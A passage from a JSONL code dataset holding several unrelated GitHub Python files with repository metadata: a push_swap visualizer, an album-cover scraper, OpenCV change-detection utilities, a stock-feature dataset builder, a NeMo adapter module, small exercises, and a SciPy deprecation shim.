[GRAPH_WIDTH + MARGIN * 2, 60])\n\n #ops\n b_text = font.render(\"ops\", True, (255,255,255));\n SCREEN.blit(b_text, [SCREEN_WIDTH - 130, 60])\n\ndef push_swap():\n random_str = [str(n) for n in random]\n args = \" \".join(random_str)\n data = subprocess.Popen([PUSH_SWAP, args], stdout=subprocess.PIPE)\n output = data.stdout.read()\n data.stdout.close()\n output = list(output.decode(\"utf-8\").split(\"\\n\"))\n output.pop()\n return (output)\n\ndef main():\n pg.init()\n stack_a = init_width(random)\n stack_b = []\n output = push_swap()\n output_nb = 0\n execute = False\n while True:\n pg.time.delay(DELAY_TIME)\n keys = pg.key.get_pressed()\n print_stack(stack_a, stack_b, output, output_nb)\n pg.display.update()\n if keys[pg.K_SPACE]:\n execute = True\n if execute == True:\n if len(output) != 0:\n apply_ops(str(output[0]), stack_a, stack_b)\n output_nb += 1\n del output[0]\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n sys.exit()\n #fill background color\n SCREEN.fill((0, 0, 0))\n text()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"itkimura/push_swap","sub_path":"bonus/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"31931525438","text":"import requests\r\nimport json\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport csv\r\nimport os\r\nimport time\r\n\r\n\r\n\r\n\r\n# Get few band names from wikipedia\r\ndef get_prog_metal_bands():\r\n\r\n\tbands_l = []\r\n\turl = 'https://en.wikipedia.org/wiki/List_of_progressive_metal_artists'\r\n\tsource = urllib.request.urlopen(url)\r\n\thtml = source.read()\r\n\tsource.close()\r\n\tsoup = BeautifulSoup(html, 'lxml')\r\n\tsoup1 = soup.body.find_all('div')\r\n\tsoup1 = soup1[2].find_all('div')[7]\r\n\tsoup1 = soup1.find_all('ul')\r\n\tfor i in range(1, len(soup1)-2):\r\n\t\tsoup2 = soup1[i].find_all('li')\r\n\t\tfor j in range(0, len(soup2)):\r\n\t\t\ttry:\r\n\t\t\t\tsoup3 = soup2[j].a.text\r\n\t\t\t\tbands_l.append(soup3)\r\n\t\t\texcept:\r\n\t\t\t\tprint('error')\r\n\r\n\tprint(bands_l)\r\n\tprint(len(bands_l))\t\r\n\t\r\n# Get few band names from wikipedia\r\ndef get_post_rock_bands():\r\n\t\t\r\n\tbands_l = []\r\n\turl = 'https://en.wikipedia.org/wiki/List_of_post-rock_bands'\r\n\tsource = urllib.request.urlopen(url)\r\n\thtml = source.read()\r\n\tsource.close()\r\n\tsoup = BeautifulSoup(html, 'lxml')\r\n\tsoup1 = soup.body.find_all('div')\r\n\tsoup1 = soup1[2].find_all('div')[7]\r\n\tprint(soup1)\r\n\r\n\r\n# Get names of metal, progressive and alernative bands and save it\r\ndef get_bands_shop():\r\n\tdata = {'prog':34, 'metal':126, 'alternative':89}\r\n\tbands_l = []\r\n\tfor dat in data:\r\n\t\tfor page in range(1, data[dat]):\r\n\t\t\turl = f'https://www.recordshopx.com/{dat}/cd/?p={page}&o=a'\r\n\t\t\tsource = urllib.request.urlopen(url)\r\n\t\t\thtml = source.read()\r\n\t\t\tsource.close()\r\n\t\t\tsoup = BeautifulSoup(html, 'lxml')\r\n\t\t\tsoup1 = soup.body.find_all('div', id=\"content\")\r\n\t\t\tsoup1 = soup1[0].find_all('div', class_='col-xs-12 col-md-8')\r\n\t\t\tsoup1 = soup1[0].find_all('ul', class_='list-unstyled list-products')[0].find_all('li')\r\n\t\t\tfor i in range(0, len(soup1) - 1):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsoup2 = soup1[i].find_all('div', class_='col-xs-8 col-sm-10 details')[0]\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(page, i)\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsoup2 = soup2.h3.text.split('\\n')[2]\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tband = soup2.split(',')\r\n\t\t\t\t\t\tband = band[0] + ' ' + band[1]\r\n\t\t\t\t\t\tbands_l.append(band)\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tbands_l.append(band[0])\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint('skipping')\r\n\t\t\tprint('sleeping 5 sec')\r\n\t\t\ttime.sleep(5)\r\n\r\n\tbands_l = list(set(bands_l))\r\n\twith open('bands.csv', 'w') as f:\r\n\t\tfor i in bands_l:\r\n\t\t\ttry:\r\n\t\t\t\tf.write(f'{i}\\n')\r\n\t\t\texcept:\r\n\t\t\t\tprint('cannot write')\r\n\r\n\r\n# Get albums covers from deezer API \r\ndef get_covers():\r\n\r\n\twith open('bands.csv', 'r') as f:\r\n\t\treader = csv.reader(f)\r\n\t\t\r\n\t\tfor i in reader:\r\n\r\n\t\t\ttry:\r\n\t\t\t\tresponse2 = requests.get(f'https://api.deezer.com/search/album?q=artist:\"{i[0]}\"/album')\r\n\t\t\t\tr2 = response2.json()\r\n\t\r\n\t\t\t\tfor j in r2['data']:\r\n\r\n\t\t\t\t\ttitle = j['title']\r\n\t\t\t\t\tpic = j['cover_big']\r\n\t\t\t\t\tif not os.path.exists(f'albums/{i}_{title}.jpg'):\r\n\t\t\t\t\t\turllib.request.urlretrieve(str(pic), f'albums/{i[0]}_{title}.jpg')\r\n\t\t\texcept:\r\n\t\t\t\tprint(f'Error getting {i}')\r\n\t\t\tprint('sleeping')\r\n\t\t\ttime.sleep(5)\r\n\t\t\t\t\r\nget_covers()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Brda92/AlbumCovers-deezer","sub_path":"album_covers_deezer.py","file_name":"album_covers_deezer.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"3188011882","text":"import cv2\nimport tkinter as tk\nimport numpy as np\n\nroot = tk.Tk()\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\ndx = int(screen_width / 2)\ndy = int(screen_height / 2)\nlabel_bar_height = 70\n\nfile_output = \"outpuFt.txt\"\n\n\ndef show(wait=False, **kwargs):\n\n x = 0\n y = 0\n for key in kwargs:\n label = key\n img = kwargs[key]\n cv2.namedWindow(label, cv2.WINDOW_NORMAL)\n cv2.imshow(label, img)\n cv2.resizeWindow(label, dx, dy - label_bar_height)\n cv2.moveWindow(label, x, y)\n screen_end = int(x / (screen_width - dx)) > 0\n x = x + dx if not screen_end else 0\n y += dy if screen_end else 0\n if wait:\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef updating_background(c_mask, frame, bck, alpha):\n bck_upd = (alpha*frame + (1-alpha)*bck)*c_mask + bck*(1-c_mask)\n return bck_upd\n\n\ndef denoise(img, n):\n img = cv2.GaussianBlur(img, (n, n), 1)\n img = cv2.medianBlur(img, n)\n return img\n\n\ndef morphology(mask):\n\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 15))\n img_morphology = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n img_morphology = cv2.morphologyEx(img_morphology, cv2.MORPH_OPEN, kernel)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n img_morphology = cv2.dilate(img_morphology, kernel, iterations=1)\n\n return img_morphology\n\n\ndef define_contour(n_frame, contours, img_contour):\n\n out_file = open(file_output, \"a\")\n size = len(contours)\n\n object_detected = 0\n\n for cnt in range(size):\n area = round(cv2.contourArea(contours[cnt]))\n perimeter = round(cv2.arcLength(contours[cnt], True))\n classification = \" \"\n\n if 400 < perimeter < 800:\n cv2.drawContours(img_contour, contours[cnt], -1, (0, 128, 0), 2)\n classification += \"person\"\n object_detected += 1\n out_file.write(\"Object Id: \" + str(object_detected) + \" | Area: \" + str(area) + \" | Perimeter: \" +\n str(perimeter) + \" | Classification:\" + classification + \"\\n\")\n elif 120 <= perimeter < 130 and area < 680:\n cv2.drawContours(img_contour, contours[cnt], -1, (255, 0, 255), 2)\n classification += \"other\"\n object_detected += 1\n out_file.write(\"Object Id: \" + str(object_detected) + \" | Area: \" + str(area) + \" | Perimeter: \" +\n str(perimeter) + \" | Classification:\" + classification + \"\\n\")\n elif 84 <= perimeter < 90:\n cv2.drawContours(img_contour, contours[cnt], -1, (255, 0, 0), 2)\n classification += \"other\"\n object_detected += 1\n out_file.write(\"Object Id: \" + str(object_detected) + \" | Area: \" + str(area) + \" | Perimeter: \" +\n str(perimeter) + \" | Classification:\" + classification + \"\\n\")\n\n out_file.write(\"Frame index: \" + str(n_frame) + \" | Object Detected: \" + str(object_detected) + \"\\n\")\n out_file.write(\"--------------------------------------------------------------\\n\")\n\n out_file.close()\n return img_contour\n\n\ndef detect_false_object(contours, gray, background, img_contour):\n\n sb_x_gray = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0, 3))\n sb_x_background = np.absolute(cv2.Sobel(background, cv2.CV_64F, 1, 0, 3))\n\n sb_y_gray = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1, 3))\n sb_y_background = np.absolute(cv2.Sobel(background, cv2.CV_64F, 0, 1, 3))\n\n for cnt in range(len(contours)):\n area = round(cv2.contourArea(contours[cnt]))\n perimeter = round(cv2.arcLength(contours[cnt], True))\n if 80 < perimeter < 130 and area < 680:\n size = len(contours[cnt])\n for j in range(size):\n y = contours[cnt][j][0][0]\n x = contours[cnt][j][0][1]\n if j == 0:\n\n sum_sb_x_gray = sb_x_gray[x,y].astype(np.int)\n sum_sb_x_back = sb_x_background[x, y].astype(np.int)\n\n sum_sb_y_gray = sb_y_gray[x, y].astype(np.int)\n sum_sb_y_back = sb_y_background[x, y].astype(np.int)\n\n else:\n\n sum_sb_x_gray += sb_x_gray[x, y].astype(np.int)\n sum_sb_x_back += sb_x_background[x, y].astype(np.int)\n\n sum_sb_y_gray += sb_y_gray[x, y].astype(np.int)\n sum_sb_y_back += sb_y_background[x, y].astype(np.int)\n\n mean_x_gray = round(sum_sb_x_gray/size)\n mean_y_gray = round(sum_sb_y_gray / size)\n\n mean_x_back = round(sum_sb_x_back / size)\n mean_y_back = round(sum_sb_y_back / size)\n\n if mean_x_gray < mean_x_back and mean_y_gray < mean_y_back:\n for j in range(len(contours[cnt])):\n y = contours[cnt][j][0][0]\n x = contours[cnt][j][0][1]\n cv2.circle(img_contour, (y, x), 1, (0, 0, 255), -1)\n","repo_name":"bombolo94/ChangeDetection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30915254066","text":"\"\"\"\nThis script looks for json data in the data directory to create training and testing set based on the 12 features\n\"\"\"\nimport os\nimport sys\nfrom datetime import datetime, timezone\nimport argparse\nimport numpy as np\nimport json\nimport pandas as pd\nfrom feature_extraction_helpers import *\nfrom utils.timezone_utils import *\n\nDATA_PATH = \"data/\"\nFILE_EXT = \".json\"\n\ndef filter_data_by_time(sorted_data, filter_by_year):\n\tremoval_indices = []\n\tfor i in range(len(sorted_data)):\n\t\tts = int(sorted_data[i]['t']) / 1000\n\t\tutc_datetime = datetime.utcfromtimestamp(ts)\n\t\tnyc_datetime = utc_datetime.replace(tzinfo=timezone.utc).astimezone(Eastern)\n\n\t\t# 0930-1130 and 1300-1500\n\t\t# year < filter_by_year remove\n\t\tif(nyc_datetime.year < filter_by_year):\n\t\t\tremoval_indices.append(i)\n\t\telif(nyc_datetime.hour >= 9 and nyc_datetime.hour < 12):\n\t\t\tif(nyc_datetime.hour == 9 and nyc_datetime.minute <= 30):\n\t\t\t\tremoval_indices.append(i)\n\t\t\telif(nyc_datetime.hour == 11 and nyc_datetime.minute > 30):\n\t\t\t\tremoval_indices.append(i)\n\t\telif(nyc_datetime.hour >= 13 and nyc_datetime.hour <= 15):\n\t\t\tif(nyc_datetime.minute > 0):\n\t\t\t\tremoval_indices.append(i)\n\t\telse:\n\t\t\tremoval_indices.append(i)\n\t# Remove\n\tfor index in sorted(removal_indices, reverse=True):\n\t\tdel sorted_data[index]\n\treturn sorted_data\n\n\ndef extract_timestamp(item):\n\ttry:\n\t\treturn int(item['t'])\n\texcept KeyError:\n\t\treturn 0\n\ndef extract_features(file_path, period_1, period_2, filter_by_time, filter_by_year):\n\twith open(file_path) as data_file:\n\t\tdata = json.load(data_file)\n\t\tresult_json_list = data['results']\n\t\tresult_dataframe = pd.DataFrame.from_records(result_json_list)\n\n\t\t# Remove All zeroes rows\n\t\tall_zeros_rows = result_dataframe[(result_dataframe['o'] ==0) | (result_dataframe['c'] == 0) | (result_dataframe['h'] == 0) | ((result_dataframe['l'] == 0))].index\n\t\tresult_dataframe.drop(all_zeros_rows, inplace = True)\n\t\tresult_json_list = json.loads(result_dataframe.to_json(orient = 'records'))\n\n\t\t# Sort according to timestamp\n\t\tresult_json_list.sort(key = extract_timestamp)\n\n\t\t# filter out data based on time\n\t\tif(filter_by_time):\n\t\t\tresult_json_list = filter_data_by_time(result_json_list, filter_by_year)\n\n\t\t# Compute technical indicators\n\t\troc_list = ROC(result_json_list, period_1)\n\t\tatr_list = ATR(result_json_list, period_1)\n\t\tma_list = MA(result_json_list, period_1)\n\t\tema_list = EMA(result_json_list, period_1)\n\t\tmacd_list = MACD(result_json_list, period_1, period_2)\n\t\tsr_list = SR(result_json_list, period_1)\n\n\t\t# Extract market variables\n\t\to_list, c_list, h_list, l_list, v_list, t_list= Market_Variables(result_json_list)\n\n\t\t# Data size check\n\t\tassert len(roc_list) == len(atr_list) == len(ma_list) == len(ema_list) == len(macd_list) == len(o_list) == len(c_list) == len(h_list) == len(l_list) == len(v_list) == len(t_list)\n\n\t\tfeatures_array = np.array([roc_list, atr_list, ma_list, ema_list, macd_list, o_list, c_list, h_list, l_list, v_list, sr_list, t_list]).T\n\t\treturn features_array\n\n\ndef normalize(train_set, test_set):\n\t# Ignore the last two column which are timestamp and sharpe ratio\n\tnorm_train_set = train_set.copy()\n\tnorm_test_set = test_set.copy()\n\tmean_vec = np.mean(train_set[:, : -3], axis = 0)\n\tmean_mat = np.repeat(np.expand_dims(mean_vec, axis = 0), norm_train_set.shape[0], axis = 0)\n\tsd_vec = np.std(train_set[:, : -3], axis = 0)\n\tsd_mat = np.repeat(np.expand_dims(sd_vec, axis = 0), norm_train_set.shape[0], axis = 0)\n\tnorm_train_set[:, : -3] = (train_set[:, : -3] - mean_mat) / sd_mat\n\tnorm_test_set[:, : -3] = (test_set[:, : -3] - mean_mat[:norm_test_set.shape[0]]) / sd_mat[:norm_test_set.shape[0]]\n\treturn norm_train_set, norm_test_set\n\ndef create_dataset(file_path, split_ratio, period_1, period_2, filter_by_time, filter_by_year):\n\tif(file_path is None):\n\t\t# Go through the entire directory\n\t\tfor file in os.listdir(DATA_PATH):\n\t\t\tif(file.endswith(FILE_EXT)):\n\t\t\t\tstock_name = file.split('_')[1]\n\t\t\t\tfile_path = os.path.join(DATA_PATH, file)\n\t\t\t\t# Extract features\n\t\t\t\tfeatures_array = extract_features(file_path, period_1, period_2, filter_by_time, filter_by_year)\n\n\t\t\t\t# Train/Test split\n\t\t\t\ttrain_size = int(features_array.shape[0] * split_ratio)\n\t\t\t\ttest_size = features_array.shape[0] - train_size\n\t\t\t\ttrain_set = features_array[: train_size]\n\t\t\t\ttest_set = features_array[train_size :]\n\t\t\t\tassert (train_set.shape[0] + test_set.shape[0]) == features_array.shape[0]\n\n\t\t\t\t# Normalize dataset\n\t\t\t\tnorm_train_set, norm_test_set = normalize(train_set, test_set)\n\t\t\t\tassert norm_train_set.shape == train_set.shape\n\t\t\t\tassert norm_test_set.shape == test_set.shape\n\n\t\t\t\t# Save file\n\t\t\t\tif(filter_by_time):\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_normalized_filtered_fyear\" + str(filter_by_year) + \"npy\", norm_train_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_raw_filtered_fyear\" + str(filter_by_year) + \"npy\", train_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_normalized_filtered_fyear\" + str(filter_by_year) + \"npy\", norm_test_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_raw_filtered_fyear\" + str(filter_by_year) + \"npy\", test_set)\n\t\t\t\telse:\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_normalized.npy\", norm_train_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_raw.npy\", train_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_normalized.npy\", norm_test_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_raw.npy\", test_set)\n\telse:\n\t\t# Process individual file\n\t\t# Assume the file in the DATA_PATH directory\n\t\tstock_name = file_path.split('/')[1].split('_')[1]\n\t\t# Extract features\n\t\tfeatures_array = extract_features(file_path, period_1, period_2, filter_by_time, filter_by_year)\n\n\t\t# Train/Test split\n\t\ttrain_size = int(features_array.shape[0] * split_ratio)\n\t\ttest_size = features_array.shape[0] - train_size\n\t\ttrain_set = features_array[: train_size]\n\t\ttest_set = features_array[train_size :]\n\t\tassert (train_set.shape[0] + test_set.shape[0]) == features_array.shape[0]\n\n\t\t# Normalize dataset\n\t\tnorm_train_set, norm_test_set = normalize(train_set, test_set)\n\t\tassert norm_train_set.shape == train_set.shape\n\t\tassert norm_test_set.shape == test_set.shape\n\t\tprint(\"train set size: \" + str(norm_train_set.shape[0]))\n\t\tprint(\"test set size: \" + str(norm_test_set.shape[0]))\n\n\t\t# Save file\n\t\tif(filter_by_time):\n\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_normalized_filtered_fyear\" + str(filter_by_year) + \".npy\", norm_train_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_raw_filtered_fyear\" + str(filter_by_year) + \".npy\", train_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_normalized_filtered_fyear\" + str(filter_by_year) + \".npy\", norm_test_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_raw_filtered_fyear\" + str(filter_by_year) + \".npy\", test_set)\n\t\telse:\n\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_normalized.npy\", norm_train_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_raw.npy\", train_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_normalized.npy\", norm_test_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_raw.npy\", test_set)\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\t# File path to specific file, if this is not provided, the script will process everything in the data directory with the right format\n\tparser.add_argument(\"--file_path\", type = str, default = None)\n\t# Train test split ratio\n\tparser.add_argument(\"--split_ratio\", type = float, default = 0.8)\n\t# Averaging period\n\tparser.add_argument(\"--period_1\", type = int, default = 10)\n\t# For MACD\n\tparser.add_argument(\"--period_2\", type = int, default = 25)\n\t# Whether to filter data by time according to paper - only keep 0930-1130 and 1300-1500\n\tparser.add_argument('--filter_by_time', default=False, help='whether to filter data by time')\n\t# Filter any data before this year\n\tparser.add_argument('--filter_by_year', type = int, default=2000, help='The oldest year to include')\n\targs = parser.parse_args()\n\n\tcreate_dataset(args.file_path, args.split_ratio, args.period_1, args.period_2, args.filter_by_time, args.filter_by_year)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"richielo/RL_Trade","sub_path":"workspace/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":8906,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"57"} +{"seq_id":"10928250103","text":"\"\"\"\nPython, by contrast, recommends snake case, whereby words are instead separated by underscores\n(_), with all letters in lowercase. For instance, those same variables would be called name, \nfirst_name, and preferred_first_name, respectively, in Python.\n\nIn a file called camel.py, implement a program that prompts the user for the name of a variable\nin camel case and outputs the corresponding name in snake case. Assume that the user’s input\nwill indeed be in camel case.\n\"\"\"\ncamel_case = input(\"camel case: \")\nfor c in camel_case:\n if c.islower():\n print (c, end=\"\")\n else:\n low = str(c).lower()\n print(f\"_{low}\", end=\"\")\nprint()\n","repo_name":"osankar/python_learn","sub_path":"assignments/set3/camel.py","file_name":"camel.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41441412427","text":"from dataclasses import dataclass\n\nfrom torch import nn as nn\n\nfrom nemo.collections.common.parts.utils import activation_registry\nfrom nemo.core.classes.mixins import adapter_mixin_strategies\n\n\nclass LinearAdapter(nn.Module):\n \"\"\"\n Simple Linear Feedforward Adapter module with LayerNorm and singe hidden layer with activation function.\n Note: The adapter explicitly initializes its final layer with all zeros in order to avoid affecting the\n original model when all adapters are disabled.\n\n Args:\n in_features: Input dimension of the module. Note that for adapters, input_dim == output_dim.\n dim: Hidden dimension of the feed forward network.\n activation: Str name for an activation function.\n norm_position: Str, can be `pre` or `post`. Defaults to `post`. Determines whether the normalization\n will occur in the first layer or the last layer. Certain architectures may prefer one over the other.\n \"\"\"\n\n def __init__(self, in_features, dim, activation: str = 'swish', norm_position=\"post\"):\n super().__init__()\n\n activation = activation_registry[activation]()\n # If the activation can be executed in place, do so.\n if hasattr(activation, 'inplace'):\n activation.inplace = True\n\n assert norm_position in ['pre', 'post']\n self.norm_position = norm_position\n\n if norm_position == 'pre':\n self.module = nn.Sequential(\n nn.LayerNorm(in_features),\n nn.Linear(in_features, dim, bias=False),\n activation,\n nn.Linear(dim, in_features, bias=False),\n )\n\n elif norm_position == 'post':\n self.module = nn.Sequential(\n nn.Linear(in_features, dim, bias=False),\n activation,\n nn.Linear(dim, in_features, bias=False),\n nn.LayerNorm(in_features),\n )\n\n # set default adapter strategy\n self.adapter_strategy = adapter_mixin_strategies.ResidualAddAdapterStrategy()\n\n # reset parameters\n self.reset_parameters()\n\n def reset_parameters(self):\n # Final layer initializations must be 0\n if self.norm_position == 'pre':\n self.module[-1].weight.data *= 0\n\n elif self.norm_position == 'post':\n self.module[-1].weight.data *= 0\n self.module[-1].bias.data *= 0\n\n def forward(self, x):\n return self.module(x)\n\n\n@dataclass\nclass LinearAdapterConfig:\n in_features: int\n dim: int\n activation: str = 'swish'\n norm_position: str = 'post'\n _target_: str = \"{0}.{1}\".format(LinearAdapter.__module__, LinearAdapter.__name__)\n","repo_name":"QDaria/NeMo","sub_path":"nemo/collections/common/parts/adapter_modules.py","file_name":"adapter_modules.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"42374648748","text":"from utils import *\nfrom collections import Counter\nprint = logger.info\n\ndef solve(D, I, S, streets, car_paths):\n \"\"\"\n disclaimer: I dont understand the motivation of the signal time of each street\n create frequency list of streets based on cars first paths. Then sort \n intersections based on that frequency list.\n Then assign signal time based on the frequency\n \"\"\"\n res= []\n intersections = {k: list() for k in range(I)}\n\n for street in streets:\n intersections[street[1]].append(street[2])\n\n prio_streets_counter = Counter({})\n for p in car_paths:\n first_street = p[1:][0]\n prio_streets_counter[first_street] += 1\n prio_streets = [ k for (k, v) in prio_streets_counter.most_common() ]\n\n all_streets_counter = Counter({})\n for p in car_paths:\n for s in p[1:]:\n all_streets_counter[s] += 1\n all_streets = [ k for (k, v) in all_streets_counter.most_common() ]\n\n res.append(str(I))\n for intersection, istreets in intersections.items():\n if not istreets:\n continue\n new_istreets = sorted(\n istreets,\n key = lambda x: prio_streets.index(x) if x in prio_streets else 99999999999\n )\n res.append(str(intersection))\n res.append(str(len(new_istreets)))\n for istreet in new_istreets:\n # res.append(f\"{istreet} 1\")\n c = prio_streets_counter[istreet] if istreet in prio_streets_counter else 1\n res.append(f\"{istreet} {max(1, c)}\")\n # c = all_streets_counter[istreet] if istreet in all_streets_counter else 1\n # res.append(f\"{istreet} {max(1, c//5)}\")\n return \"\\n\".join(res)\n\n@timer\ndef helper():\n return \"bro\"\n","repo_name":"chip2n/hashcode-practice","sub_path":"qualifier/heur6.py","file_name":"heur6.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"27335754457","text":"class MyType(type):\n def __new__(mcls, name, bases, cls_dict):\n new_class = super().__new__(mcls, name, bases, cls_dict)\n return new_class\n\nclass Person(metaclass=MyType): ...\n\nclass SlottedStruct(type):\n def __new__(mcls, name, bases, class_dict):\n cls_object = super().__new__(mcls, name, bases, class_dict)\n\n setattr(cls_object, '__slots__', [f'_{field}' for field in cls_object._fields])\n\n for field in cls_object._fields:\n slot = f'_{field}'\n setattr(cls_object, field, property(fget=lambda self, attrib=slot: getattr(self, attrib)))\n\n def eq(self, other):\n if isinstance(other, cls_object):\n self_fields = [getattr(self, field) for field in cls_object._fields]\n other_fields = [getattr(other, field) for field in other._fields]\n return self_fields == other_fields\n return False\n setattr(cls_object, '__eq__', eq)\n\n def hash_(self):\n field_values = (getattr(self, field) for field in cls_object._fields)\n return hash(tuple(field_values))\n setattr(cls_object, '__hash__', hash_)\n\n def string_(self):\n field_values = (getattr(self, field) for field in cls_object._fields)\n field_values_joined = ', '.join(map(str, field_values))\n return f'{cls_object.__name__}({field_values_joined})'\n setattr(cls_object, '__str__', string_)\n\n","repo_name":"shawnmartin-py/python-snippets","sub_path":"unorganized/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"38874087131","text":"# This file is not meant for public use and will be removed in SciPy v2.0.0.\n# Use the `scipy.signal` namespace for importing the functions\n# included below.\n\nimport warnings\nfrom . import _signaltools\n\n__all__ = [ # noqa: F822\n 'correlate', 'correlation_lags', 'correlate2d',\n 'convolve', 'convolve2d', 'fftconvolve', 'oaconvolve',\n 'order_filter', 'medfilt', 'medfilt2d', 'wiener', 'lfilter',\n 'lfiltic', 'sosfilt', 'deconvolve', 'hilbert', 'hilbert2',\n 'cmplx_sort', 'unique_roots', 'invres', 'invresz', 'residue',\n 'residuez', 'resample', 'resample_poly', 'detrend',\n 'lfilter_zi', 'sosfilt_zi', 'sosfiltfilt', 'choose_conv_method',\n 'filtfilt', 'decimate', 'vectorstrength',\n 'timeit', 'cKDTree', 'dlti', 'upfirdn', 'linalg',\n 'sp_fft', 'lambertw', 'get_window', 'axis_slice', 'axis_reverse',\n 'odd_ext', 'even_ext', 'const_ext', 'cheby1', 'firwin'\n]\n\n\ndef __dir__():\n return __all__\n\n\ndef __getattr__(name):\n if name not in __all__:\n raise AttributeError(\n \"scipy.signal.signaltools is deprecated and has no attribute \"\n f\"{name}. Try looking in scipy.signal instead.\")\n\n warnings.warn(f\"Please use `{name}` from the `scipy.signal` namespace, \"\n \"the `scipy.signal.signaltools` namespace is deprecated.\",\n category=DeprecationWarning, stacklevel=2)\n\n return getattr(_signaltools, name)\n","repo_name":"scipy/scipy","sub_path":"scipy/signal/signaltools.py","file_name":"signaltools.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":11925,"dataset":"github-code","pt":"57"} +{"seq_id":"41604431746","text":"import json\nd={\n \"shopping_list\":\n { \n \"chaco\":\"15\",\n \"Biscuits\":\"50\",\n \"Diary_milk\":\"30\",\n \"ice_cream\":\"20\",\n } \n}\nuser1=input(\"enter what you want from this list : \") \nuser2=int(input(\"Enter the quantity of \"))\n\nfor i in d:\n \n for j in d[i]:\n if user1==j:\n x=user2*int(d[i][j])\n print(x)\nd[i].pop(user1) \nuser=input(\"Enter a item : \")\nask=input(\"Enter value :\")\nd[i][user]=ask\n\nwith open(\"Q9.json\",\"w\") as h:\n f=json.dump(d,h,indent=4)\n print(f)\n\n\n\n\n\n\n\n","repo_name":"karuna131/PYTHON","sub_path":"python_json/Q9.py","file_name":"Q9.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9813078450","text":"from multiprocessing import Manager, Process\nfrom typing import List, Optional, Union\n\nimport numpy as np\nimport tenseal as ts\n\n# always compute on the first split set\n\n\nclass Party1v1:\n def __init__(self, s, n_split):\n self.n = s.shape[0]\n self.m = s.shape[1]\n self.s: np.ndarray = s\n self.context = None\n self.s_split: Union[List[np.ndarray], List[ts.CKKSVector]] = [\n t for t 